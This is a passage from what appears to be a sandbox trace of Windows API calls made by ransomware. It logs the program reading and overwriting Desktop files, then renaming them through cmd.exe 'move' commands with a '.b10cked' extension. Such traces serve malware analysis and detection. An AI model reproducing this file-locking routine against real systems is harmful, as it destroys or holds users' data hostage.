| out: lpMultiByteStr="CKLvAyoW1loaz.flv", lpUsedDefaultChar=0x0) returned 17 [0219.746] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1835d [0219.746] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.746] CloseHandle (hObject=0x1b4) returned 1 [0219.747] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV") returned 0x25 [0219.747] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.747] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x520, dwThreadId=0xf58)) returned 1 [0219.758] CloseHandle (hObject=0x120) returned 1 [0219.758] CloseHandle (hObject=0x1b4) returned 1 [0219.758] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.758] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.758] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.758] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.758] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.759] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.759] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.759] ReleaseMutex (hMutex=0xf8) returned 1 [0219.759] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.759] ReleaseMutex (hMutex=0xf8) returned 1 [0219.759] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.759] ReleaseMutex (hMutex=0xf8) returned 1 [0219.759] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.759] ReleaseMutex (hMutex=0xf8) returned 1 [0219.759] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots" (normalized: "c:\\users\\eebsym5\\desktop\\dcft2dy7m6d8j9.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.759] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27654834139) returned 1 [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x72fb [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x6e13 [0219.760] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.761] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.761] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.761] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x72fb [0219.761] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.762] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.762] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.762] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x72fb [0219.762] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.762] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.762] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x397c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x397c, lpOverlapped=0x0) returned 1 [0219.762] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.762] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x397c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x397c, lpOverlapped=0x0) returned 1 [0219.762] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-14716, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x397f [0219.762] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x397c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x397c, lpOverlapped=0x0) returned 1 [0219.762] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-14716, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x397f [0219.762] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x397c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x397c, lpOverlapped=0x0) returned 1 [0219.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dcFt2Dy7M6d8J9.ots", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0219.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dcFt2Dy7M6d8J9.ots", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dcFt2Dy7M6d8J9.ots", lpUsedDefaultChar=0x0) returned 18 [0219.843] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x72fb [0219.843] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.843] CloseHandle (hObject=0x1b4) returned 1 [0219.844] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS") returned 0x25 [0219.845] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.845] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS\" \"C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS\" \"C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xf44, dwThreadId=0xc98)) returned 1 [0219.862] CloseHandle (hObject=0x120) returned 1 [0219.862] CloseHandle (hObject=0x1b4) returned 1 [0219.862] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.862] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.862] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.862] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.862] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.862] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.862] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.862] ReleaseMutex (hMutex=0xf8) returned 1 [0219.862] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.862] ReleaseMutex (hMutex=0xf8) returned 1 [0219.862] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.862] ReleaseMutex (hMutex=0xf8) returned 1 [0219.862] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.862] ReleaseMutex (hMutex=0xf8) returned 1 [0219.862] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png" (normalized: "c:\\users\\eebsym5\\desktop\\ddlqzm1zrumfqtdj.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27665203068) returned 1 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xfc9c [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xf7b4 [0219.864] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.865] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.865] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.865] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xfc9c [0219.865] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.865] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.865] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.866] SetFilePointer (in: hFile=0x1b4, 